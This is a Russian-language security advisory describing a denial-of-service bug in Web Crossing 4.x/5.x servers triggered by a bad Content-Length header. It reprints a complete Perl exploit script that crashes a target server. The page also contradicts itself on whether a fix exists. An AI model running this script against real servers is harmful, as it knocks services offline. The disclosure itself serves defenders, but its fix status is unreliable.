| Дата публикации: | 09.02.2004 |
| Всего просмотров: | 1357 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: |
Web Crossing 4.x
Web Crossing 5.x |
| Уязвимые версии: Web Crossing 4.х, 5.х
Описание: Отказ в обслуживании обнаружен в Web Crossing. Удаленный пользователь может аварийно завершить работу сервера. Удаленный пользователь может представить HTTP POST запрос с отрицательным или чрезмерно большим заголовком 'Content-Length', чтобы аварийно завершить работу сервера. Пример/Эксплоит:
#!/usr/bin/perl -w
# Web Crossing 4.x\5.x Denial of Service Exploit
# [ Bad 'Content-Length' Header Bug ]
# - by Peter Winter-Smith [peter4020@hotmail.com]
use IO::Socket;
if(!($ARGV[0]))
print "Usage: wxdos.pl <victim>\n";
exit;
print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
"\t[ Bad 'Content-Length' Header Bug ]\n" .
"\t[peter4020\@hotmail.com]\n\n";
$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on " .
"port 80";
$DoS = "POST / HTTP/1.1\r\n" .
"Content-Length: -1\r\n\r\n";
print $victim $DoS;
print "[+] Evil request made to target server ... Waiting...!\n";
sleep(4);
close($victim);
print "[+] Done!\n";
exit;
URL производителя:http://webcrossing.com/Home/products/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Web Crossing 4.x/5.x Denial of Service Vulnerability |